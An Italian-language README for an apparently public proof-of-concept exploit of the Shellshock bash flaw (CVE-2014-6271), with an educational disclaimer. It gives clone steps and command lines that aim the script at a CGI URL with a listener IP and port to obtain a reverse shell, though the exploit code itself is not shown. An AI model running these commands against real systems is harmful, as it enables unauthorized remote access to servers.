
Exploit di Shellshock (CVE-2014-6271)
Questo repository contiene un exploit per una vulnerabilità che colpisce i sistemi basati su Unix. Si prega di notare che si tratta semplicemente di uno script proof-of-concept creato a scopo educativo e che dovrebbe essere utilizzato in modo responsabile.
Questo exploit è progettato per dimostrare come funziona l'attacco shellshock e come potrebbe essere utilizzato per ottenere accesso shell a un sistema tramite un'intestazione di richiesta creata in modo malevolo.
Questo repository è destinato esclusivamente a scopi educativi. Non utilizzare questo codice o qualsiasi informazione in esso contenuta per scopi malevoli. Segui sempre le linee guida etiche e rispetta la legge.
Utilizzo:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Esempio:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Prerequisiti:
Clona questo repository sulla tua macchina locale.
git clone https://github.com/AlissonFaoli/Shellshock.git
Naviga nella directory del progetto.
cd Shellshock
Esegui lo script shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Questo exploit è rilasciato sotto la licenza MIT. Puoi trovare maggiori informazioni al riguardo nel file LICENSE.
Se hai domande o dubbi su questo exploit, non esitare a contattare l'autore